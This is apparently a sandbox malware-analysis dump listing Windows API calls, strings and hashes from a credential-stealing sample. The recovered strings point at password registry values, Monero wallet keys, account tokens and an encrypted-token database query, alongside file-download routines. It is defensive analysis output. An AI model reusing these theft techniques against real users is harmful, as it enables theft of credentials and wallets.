                          • Instruction Fuzzy Hash: B6211DB1E44618ABDB04DFD4DC49FAEBBBCFB44B10F108519F609BB280D77869018BA5
                          APIs
                            • Part of subcall function 0017A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0017A7E6
                            • Part of subcall function 001647B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00164839
                            • Part of subcall function 001647B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00164849
                          • InternetOpenA.WININET(00180DF7,00000001,00000000,00000000,00000000), ref: 0016610F
                          • StrCmpCA.SHLWAPI(?,00CCFC38), ref: 00166147
                          • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0016618F
                          • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 001661B3
                          • InternetReadFile.WININET(?,?,00000400,?), ref: 001661DC
                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0016620A
                          • CloseHandle.KERNEL32(?,?,00000400), ref: 00166249
                          • InternetCloseHandle.WININET(?), ref: 00166253
                          • InternetCloseHandle.WININET(00000000), ref: 00166260
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                           • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                          • String ID:
                          • API String ID: 2507841554-0
                          • Opcode ID: 38a2fe26aaedf75adfe0c0b69ebe4301d2902cec7dce715c957a521eef4293a9
                          • Instruction ID: 39650210d19a935fe7071e6094628bc660114c8ccfc050a3da14f3fbd6f7ed43
                          • Opcode Fuzzy Hash: 38a2fe26aaedf75adfe0c0b69ebe4301d2902cec7dce715c957a521eef4293a9
                          • Instruction Fuzzy Hash: 765171B1940218ABDB24DFA0DC59BEE77B8FF44701F108098B609A71C0DB756A89CF95
                          APIs
                          • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0016733A
                          • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 001673B1
                          • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0016740D
                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00167452
                          • HeapFree.KERNEL32(00000000), ref: 00167459
                          • task.LIBCPMTD ref: 00167555
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                           • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$EnumFreeOpenProcessValuetask
                          • String ID: Password
                          • API String ID: 775622407-3434357891
                          • Opcode ID: 762c0c02865d4d47a9ac93522562a7157eb11537d50a807f76a2c9b73b01cd20
                          • Instruction ID: ff65391b6baf63edb3f00be4ea0e865e687a544b8b9cc321204938e03073910f
                          • Opcode Fuzzy Hash: 762c0c02865d4d47a9ac93522562a7157eb11537d50a807f76a2c9b73b01cd20
                          • Instruction Fuzzy Hash: A8614BB19142289BDB24DB50CC55BEAB7BCBF58304F0081E9E649A6181DF705BD9CFA1
                          APIs
                            • Part of subcall function 0017A740: lstrcpy.KERNEL32(00180E17,00000000), ref: 0017A788
                            • Part of subcall function 0017A9B0: lstrlen.KERNEL32(?,00CC9188,?,\Monero\wallet.keys,00180E17), ref: 0017A9C5
                            • Part of subcall function 0017A9B0: lstrcpy.KERNEL32(00000000), ref: 0017AA04
                            • Part of subcall function 0017A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0017AA12
                            • Part of subcall function 0017A920: lstrcpy.KERNEL32(00000000,?), ref: 0017A972
                            • Part of subcall function 0017A920: lstrcat.KERNEL32(00000000), ref: 0017A982
                            • Part of subcall function 0017A8A0: lstrcpy.KERNEL32(?,00180E17), ref: 0017A905
                            • Part of subcall function 0017A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0017A7E6
                          • lstrlen.KERNEL32(00000000), ref: 0016BC9F
                            • Part of subcall function 00178E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00178E52
                          • StrStrA.SHLWAPI(00000000,AccountId), ref: 0016BCCD
                          • lstrlen.KERNEL32(00000000), ref: 0016BDA5
                          • lstrlen.KERNEL32(00000000), ref: 0016BDB9
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                           • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                          • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                          • API String ID: 3073930149-1079375795
                          • Opcode ID: baf8700c42b4eef2ce7bbf4f758d9091cd2e315b421a8beef7b550f054d6c4a6
                          • Instruction ID: 6ab0194265178f1348538d03149f5c9f2708ee09dce853cc4cd95558a9dd56d7
                          • Opcode Fuzzy Hash: baf8700c42b4eef2ce7bbf4f758d9091cd2e315b421a8beef7b550f054d6c4a6
                          • Instruction Fuzzy Hash: 0CB12772910104ABDB05FBA0DD96DEE733DAFA4301F808558F50AA7091EF346F59CB62
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                           • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitProcess$DefaultLangUser
                          • String ID: *
                          • API String ID: 1494266314-163128923
                          • Opcode ID: c664ea807934a20027ebaa251f2aba328518492c7e7f014567826fb4978f7a32
                          • Instruction ID: 03844f0be93b32302fee1ee2e8b24d433c1089a452aae13f24b977903485f0b0
                          • Opcode Fuzzy Hash: c664ea807934a20027ebaa251f2aba328518492c7e7f014567826fb4978f7a32
                          • Instruction Fuzzy Hash: 17F05E32904609EFD3859FE0E90977D7B78FB06703F140198E61986290D7754F81DB96
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00164FCA
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00164FD1
                          • InternetOpenA.WININET(00180DDF,00000000,00000000,00000000,00000000), ref: 00164FEA
                          • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00165011
                          • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00165041
                          • InternetCloseHandle.WININET(?), ref: 001650B9
                          • InternetCloseHandle.WININET(?), ref: 001650C6
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                           • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                          • String ID:
                          • API String ID: 3066467675-0
                          • Opcode ID: 9b37b54efbb26fd93a1d9bffef2a5489a5993b2f191abb0b2adb69d168ff43dd
                          • Instruction ID: 696ef6e3cceddafe29700801142d92855b7c289dd798963f5e34fb48ce3169f3
                          • Opcode Fuzzy Hash: 9b37b54efbb26fd93a1d9bffef2a5489a5993b2f191abb0b2adb69d168ff43dd
                          • Instruction Fuzzy Hash: C33108B5A40218ABDB20CF94DC85BDDB7B8EB48704F5081D8FA09A7281C7706AC5CF99
                          APIs
                          • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00178426
                          • wsprintfA.USER32 ref: 00178459
                          • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0017847B
                          • RegCloseKey.ADVAPI32(00000000), ref: 0017848C
                          • RegCloseKey.ADVAPI32(00000000), ref: 00178499
                            • Part of subcall function 0017A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0017A7E6
                          • RegQueryValueExA.ADVAPI32(00000000,00CCF0F8,00000000,000F003F,?,00000400), ref: 001784EC
                          • lstrlen.KERNEL32(?), ref: 00178501
                          • RegQueryValueExA.ADVAPI32(00000000,00CCF218,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00180B34), ref: 00178599
                          • RegCloseKey.ADVAPI32(00000000), ref: 00178608
                          • RegCloseKey.ADVAPI32(00000000), ref: 0017861A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                           • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                          • String ID: %s\%s
                          • API String ID: 3896182533-4073750446
                          • Opcode ID: 03c2de3702febb20dfe9a84d162c55e5630a5dad4ea1a92fe9091d28632b48b3
                          • Instruction ID: 97cf61eec909e51b5cdc1745f5fda0b892eb25e9012bedcb9cee417301c5298e
                          • Opcode Fuzzy Hash: 03c2de3702febb20dfe9a84d162c55e5630a5dad4ea1a92fe9091d28632b48b3
                          • Instruction Fuzzy Hash: 2821FA7295021CABDB64DB54DC85FE9B7B8FB48700F00C5D8E609A6140DF756A85CFD4
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 001776A4
                          • RtlAllocateHeap.NTDLL(00000000), ref: 001776AB
                          • RegOpenKeyExA.ADVAPI32(80000002,00CBB7F0,00000000,00020119,00000000), ref: 001776DD
                          • RegQueryValueExA.ADVAPI32(00000000,00CCEFF0,00000000,00000000,?,000000FF), ref: 001776FE
                          • RegCloseKey.ADVAPI32(00000000), ref: 00177708
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID: Windows 11
                          • API String ID: 3225020163-2517555085
                          • Opcode ID: 2f0ac4c8fa808b44fabf3c45662df81700b98c6195377e0210c3bc1b3ce1dc34
                          • Instruction ID: ca74abb01e2cb410c90d824069711580042e8e943c3e157c3d450d4ed1839565
                          • Opcode Fuzzy Hash: 2f0ac4c8fa808b44fabf3c45662df81700b98c6195377e0210c3bc1b3ce1dc34
                          • Instruction Fuzzy Hash: C3018FB6A04208BBEB05DBE4DC4DF6AB7BCEB48701F008054FA08972D0D7749A04CB51
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00177734
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0017773B
                          • RegOpenKeyExA.ADVAPI32(80000002,00CBB7F0,00000000,00020119,001776B9), ref: 0017775B
                          • RegQueryValueExA.ADVAPI32(001776B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0017777A
                          • RegCloseKey.ADVAPI32(001776B9), ref: 00177784
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID: CurrentBuildNumber
                          • API String ID: 3225020163-1022791448
                          • Opcode ID: 126a493cc99c6439552e781f4e14f57421643ddfd599d3cf2ed59ba39801342a
                          • Instruction ID: 82e2da1baf10385b3f2dcc40799b7d2b891c204ada688f038df0099176105baf
                          • Opcode Fuzzy Hash: 126a493cc99c6439552e781f4e14f57421643ddfd599d3cf2ed59ba39801342a
                          • Instruction Fuzzy Hash: 9A014FBAA40308BBDB01DBE4DC4AFBEBBBCEB48701F004158FA05A7281DB755A00CB51
                          APIs
                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001699EC
                          • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00169A11
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00169A31
                          • ReadFile.KERNEL32(000000FF,?,00000000,0016148F,00000000), ref: 00169A5A
                          • LocalFree.KERNEL32(0016148F), ref: 00169A90
                          • CloseHandle.KERNEL32(000000FF), ref: 00169A9A
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                          • String ID:
                          • API String ID: 2311089104-0
                          • Opcode ID: 3961633b9a0e7a8b30d234ef3c53b5b00532f4c37a78b62199bf18e7547114ae
                          • Instruction ID: 8f1511b8c60db946dd30668898730a5ace2868c37a63acd9685e54a6fb7c2744
                          • Opcode Fuzzy Hash: 3961633b9a0e7a8b30d234ef3c53b5b00532f4c37a78b62199bf18e7547114ae
                          • Instruction Fuzzy Hash: E1310A74A00209EFDB14CF94C985BAE77F9FF49340F108158E916A7390D779A951CFA1
                          APIs
                          • lstrcat.KERNEL32(?,00CCF2D8), ref: 001747DB
                            • Part of subcall function 00178DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00178E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 00174801
                          • lstrcat.KERNEL32(?,?), ref: 00174820
                          • lstrcat.KERNEL32(?,?), ref: 00174834
                          • lstrcat.KERNEL32(?,00CBA668), ref: 00174847
                          • lstrcat.KERNEL32(?,?), ref: 0017485B
                          • lstrcat.KERNEL32(?,00CCE298), ref: 0017486F
                            • Part of subcall function 0017A740: lstrcpy.KERNEL32(00180E17,00000000), ref: 0017A788
                            • Part of subcall function 00178D90: GetFileAttributesA.KERNEL32(00000000,?,00161B54,?,?,0018564C,?,?,00180E1F), ref: 00178D9F
                            • Part of subcall function 00174570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00174580
                            • Part of subcall function 00174570: RtlAllocateHeap.NTDLL(00000000), ref: 00174587
                            • Part of subcall function 00174570: wsprintfA.USER32 ref: 001745A6
                            • Part of subcall function 00174570: FindFirstFileA.KERNEL32(?,?), ref: 001745BD
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                          • String ID:
                          • API String ID: 2540262943-0
                          • Opcode ID: 7d4a85bcac3e942cd6c532db3aece0bb8e86942f509d8c76abb175bafccfe571
                          • Instruction ID: 001519d9a9714673c0544122c8b5052116a98a99dee8a5299fdeb1cd62ac3b78
                          • Opcode Fuzzy Hash: 7d4a85bcac3e942cd6c532db3aece0bb8e86942f509d8c76abb175bafccfe571
                          • Instruction Fuzzy Hash: F931A8B294021867CB51FBB0DC89EED737CBB99704F408589B31996081EF749789CF91
                          APIs
                            • Part of subcall function 0017A740: lstrcpy.KERNEL32(00180E17,00000000), ref: 0017A788
                            • Part of subcall function 0017A9B0: lstrlen.KERNEL32(?,00CC9188,?,\Monero\wallet.keys,00180E17), ref: 0017A9C5
                            • Part of subcall function 0017A9B0: lstrcpy.KERNEL32(00000000), ref: 0017AA04
                            • Part of subcall function 0017A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0017AA12
                            • Part of subcall function 0017A920: lstrcpy.KERNEL32(00000000,?), ref: 0017A972
                            • Part of subcall function 0017A920: lstrcat.KERNEL32(00000000), ref: 0017A982
